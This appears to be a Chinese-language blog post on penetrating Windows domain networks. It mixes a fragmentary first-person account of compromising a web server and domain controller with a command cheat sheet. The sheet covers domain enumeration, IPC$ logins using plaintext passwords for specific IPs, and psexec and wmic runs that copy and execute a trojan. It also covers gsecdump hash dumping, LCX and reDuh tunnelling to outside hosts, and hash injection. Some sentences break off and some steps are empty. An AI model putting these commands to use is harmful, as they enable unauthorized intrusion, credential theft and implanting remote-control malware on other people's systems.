1.ipconfig /all
//可以查看到当前网卡配置信息,包括所属域以及IP段
这个命令可以看到:主机名字—shwdm,IP–192.
2.net view
//显示正由指定的计算机共享的域、计算机或资源的列表。
可以看到我们当前域共有8台机器,我们的这台机器–SHWDM 也在其中
3.ping 机器名
//显示该机器名的IP
如图PING BJCWSERVER,
4.net view /domain
//查看有多少域
5.net view /domain:testdomain(testdomain 假设为目标的其中一个域)
//此命令是查看 testdomain域中的计算机列表
我们分别查看这三个域中的计算机列表,
6.net user /domain
//获取所有域用户列表
7.net group /domain
//获取域用户组信息
8.net group “domain admins” /domain
//查看与管理组成员
9.net user domain-admin /domain
//查看管理员登陆时间,密码过期时间,是否有登陆脚本,
10.net time /domain
//可以查看域时间,以及域服务器的名字)
总结下,通过这次信息收集,我们可以得到:
1.这个内网的网关为 192.168.103.10,DNS 域名解析IP为192.168.100.1,
2.一共有三个域,其中WORKGROUP域下面有8台机器(
1.收集信息。
1-1.不论什么途径获得的内网机器,确定他在内网后,
既然有了他的机器,那么翻翻他的电脑这是必要的,
1-2.了解了一定的人员信息,期间你要记下你所掌握到的账号,
ipconfig /all 查询一下本机的一些情况,IP段 网关 属于不属于域
net view 查询一些存在联系的机器,一般以机器名显示,
net view /domain 查询有几个域 因为大型网络里面一般不止一个域的
net group /domain 查询域里面的组
net user /domain 查询域用户
net group “domain admins” /domain 查询域管理用户组
这些都是我们需要了解的,当然有时候还会需要再查询一些信息,
2.信息归档
2-1。有了信息,我们就要对信息进行一定的归档,
2-2。查询出的用户,管理员,我们也必须归档。
2-3。查询信息时可能出现的有利用价值信息必须归档。
3.技术利用
3-1。不论是通过键盘记录。或者HASH的抓取,
3-1-1。利用远控的键盘记录进行抓取。
3-1-2。
3-1-3。用GINASTUB.
3-2。有了内网,
3-2-1。我在这推荐 VIDC 这个工具,很方便,在CMD下直接操 VIDC.EXE -D -P PORT 就可以了。
3-2-2。在利用机器上使用LCX,CMD下 LCX.EXE -SLAVE 服务器IP PORT 127.0.0.1 PORT,然后到服务器上 CMD下 LCX.EXE -LISTEN 服务器IP PORT 任意PORT。
3-2-3。
基本上我们就只能操作这么多了,
我们在得到内网机器后,如果他存在域,
进入域后,我们又该怎么做,建立SOCKS后又该怎么做。
一旦拥有密码,我们就可以尝试IPC连接,直接拿下域,
net use \\IP\ipc$ password /user:username@domain
推荐使用这样的方式输入账号和密码,为什么?
是的,以前我也认为不会,微软的讲师也说不会,不过,
建立IPC后,你只是想COPY文件 或者 RAR文件 再或者种马 那就是你的自由了。
后话:最近因为在渗域,在渗透过程中,也确实出现一些问题,
拿下内网WEB服务器后,我就已经完全在域内,没有使用HASH INJECTION,我是先查询了DOMAIN ADMINS,发现WEB服务器上的账号就属于这个组,
连接了IPC$,直接在其SYSYTEM32下扔了一个远控,
给域控服务器种了远控,
总的来说,我这次的渗透比较运气好,中间麻烦事不是太多,
后来,我获取了他的网络拓补图,
已经很晚了,本来是在写一份详细的渗透过程,不过因为一直工作,
常用命令
net view
查看同一域/工作组的计算机列表
net view /domain
查看域/工作组列表
net view /domain:Secwing
查看Secwing域中 计算机列表
net group /domain
查看所在域的组
net user /domain
查看所在域用户
net user /domain zerosoul 12345678
修改域用户密码,需要域管理员权限,或者Ctrl+Alt+
net localgroup administrators SECWING\zerosoul /add
域Users组用户添加到本地Administrators组,
下面的命令 只能用于 域控制器:
net group “Domain controllers”
查看域控制器(如果有多台)
net group
查看域的组
net group “domain admins”
查看域管理员
net group “domain users”
查看域管理员
PS:打开配置域控制器向导的命令
dcpromo
psexec /accepteula 绕过第一次验证窗口
mstsc/admin 解决hash无法抓出问题
wmic /node:172.16.19.96 /user:ABIMAQ\Administrator /password:k78m90 process call create c:\kav\2009.exe
psexec.exe -s -u administrator -p k78m90 \\172.16.16.2 -c c:\kav\2009.exe 拷贝文件并且执行
psexec.exe -s -u administrator -p km3h7i \\172.16.16.2 -c c:\kav\gsecdump.exe -u 抓取hash
net use \\172.16.16.2\IPC$ “k78m90″ /user:”admintitrator”
net use \\172.16.16.2\IPC$ “k78m90″ /user:”aABIMAQ\Administrator”
net time \\172.16.16.2
at \\172.16.16.2 13:50 2009.exe
java reDuhClient fdc1.cnhan.com http 80 /admin/reduh.aspx reduh连接命令
[createTunnel]1234:127.0.0.1:
iam-alt -h user-hash 这样hash就被注入了
whosthere-alt.exe 来查看是否被注入成功。
No comments:
Post a Comment